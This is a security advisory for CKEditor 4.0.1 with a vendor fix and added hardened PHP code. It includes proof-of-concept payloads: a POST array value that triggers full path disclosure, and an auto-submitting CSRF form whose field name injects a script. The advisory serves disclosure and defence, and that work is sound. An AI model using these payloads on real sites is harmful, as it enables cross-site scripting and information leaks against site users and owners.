
CKEditor 4.0.1 - Multiple Vulnerabilities

2013-02-21 14:15
Affected program: ckeditor 4.0.1 standard
Download address: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulnerability type: Full Path Disclosure && XSS
===========================================
Test system: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
 
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
        <meta charset="utf-8">
        <title>Sample &mdash; CKEditor</title>
        <link rel="stylesheet" href="sample.css">
</head>
<body>
        <h1 class="samples">
                CKEditor &mdash; Posted Data
        </h1>
        <table border="1" cellspacing="0" id="outputSample">
                <colgroup><col width="120"></colgroup>
                <thead>
                        <tr>
                                <th>Field&nbsp;Name</th>
                                <th>Value</th>
                        </tr>
                </thead>
<?php
 
if ( isset( $_POST ) )
        $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST
else
        $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
 
foreach ( $postArray as $sForm => $value )
{
        if ( get_magic_quotes_gpc() )
                $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
        else
                $postedValue = htmlspecialchars( $value ) ;
 
?>
                <tr>
                        <th style="vertical-align: top"><?php echo $sForm?></th>
                        <td><pre class="samples"><?php echo $postedValue?></pre></td>
                </tr>
        <?php
}
?>
        </table>
        <div id="footer">
                <hr>
                <p>
                        CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
                </p>
                <p id="copy">
                        Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
                </p>
        </div>
</body>
</html>
 
 
=============SNIP ENDS HERE====================
 
 
 
Full Path Disclosure example:
 
URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST
 
HEADERS:
 
Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
 
 
 
$_POST DATA TO SEND:
 
 
bangbangbang[]=PATH DISCLOSURE
 
 
 
 
Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38
 
Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
 
=================================================
 
CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF">
</form>
 
=================================================
 
Print Screen:  http://i062.radikal.ru/1302/e6/25ef023dd589.png
 
 
 
=================================================
And here is the fixed version: /ckeditor/samples/assets/posteddata.php
 
================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
  <meta charset="utf-8">
  <title>Sample &mdash; CKEditor</title>
  <link rel="stylesheet" href="sample.css">
</head>
<body>
  <h1 class="samples">
    CKEditor &mdash; Posted Data
  </h1>
  <table border="1" cellspacing="0" id="outputSample">
    <colgroup><col width="120"></colgroup>
    <thead>
      <tr>
        <th>Field&nbsp;Name</th>
        <th>Value</th>
      </tr>
    </thead>
<?php
 
if ( isset( $_POST ) )
  $postArray = &$_POST ;      // 4.1.0 or later, use $_POST
else
  $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS
 
foreach ( $postArray as $sForm => $value )
{
  if ( get_magic_quotes_gpc() )
    $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
  else
    $postedValue = htmlspecialchars((string) $value ) ;
 
?>
    <tr>
      <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
      <td><pre class="samples"><?php echo $postedValue?></pre></td>
    </tr>
  <?php
}
?>
  </table>
  <div id="footer">
    <hr>
    <p>
      CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
    </p>
    <p id="copy">
      Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
    </p>
  </div>
</body>
</html> 
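The fixed version above silences the warning by casting each value to string, but on PHP 5.4 and later casting an array to string itself raises an "Array to string conversion" notice, so with display_errors on the path still leaks. The following is an added example (not CKSource's code, and not part of the original advisory) of a hardened replacement for the echo loop: it flattens nested POST arrays so htmlspecialchars() only ever sees scalars, and escapes the field name as well as the value. It assumes PHP 7 or later; the function names flattenPosted, escapeHtml and renderPostedRows are mine.

```php
<?php
// Added example, not CKSource's code. Hardened replacement for the loop in
// samples/assets/posteddata.php: no array ever reaches htmlspecialchars()
// (the call whose warning disclosed the path) and the field NAME is escaped
// too, which closes the XSS from a field named <script>...</script>.

/**
 * Flatten a (possibly nested) POST array into "name[key][key]" => string
 * pairs, so every value handed to the escaper is a scalar.
 */
function flattenPosted(array $data, string $prefix = ''): array
{
    $rows = [];
    foreach ($data as $key => $value) {
        $name = $prefix === '' ? (string) $key : $prefix . '[' . $key . ']';
        if (is_array($value)) {
            $rows += flattenPosted($value, $name);   // recurse into a[]=x, a[b]=y
        } else {
            $rows[$name] = (string) $value;          // scalar from here on
        }
    }
    return $rows;
}

/** Escape one string for an HTML text context (both quote styles, UTF-8). */
function escapeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render posted data as table rows with name and value both escaped. */
function renderPostedRows(array $post): string
{
    $html = '';
    foreach (flattenPosted($post) as $name => $value) {
        $html .= '<tr><th style="vertical-align: top">' . escapeHtml($name) . '</th>'
               . '<td><pre class="samples">' . escapeHtml($value) . '</pre></td></tr>' . "\n";
    }
    return $html;
}

// Constructed sample input mirroring the advisory's two payloads:
$sample = [
    'bangbangbang' => ['PATH DISCLOSURE'],           // array value: no warning now
    "<script>alert('AkaStep');</script>" => 'SENDF', // hostile field name: escaped
];
echo renderPostedRows($sample);
// Second row's <th> now holds &lt;script&gt;alert(&#039;AkaStep&#039;);&lt;/script&gt;
```

Independently of the code change, a sample page like this has no business on a production host: removing the samples directory and keeping display_errors off are the mitigations that cover both issues at once.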
Source: www.2cto.com/Article/201302/190221.html
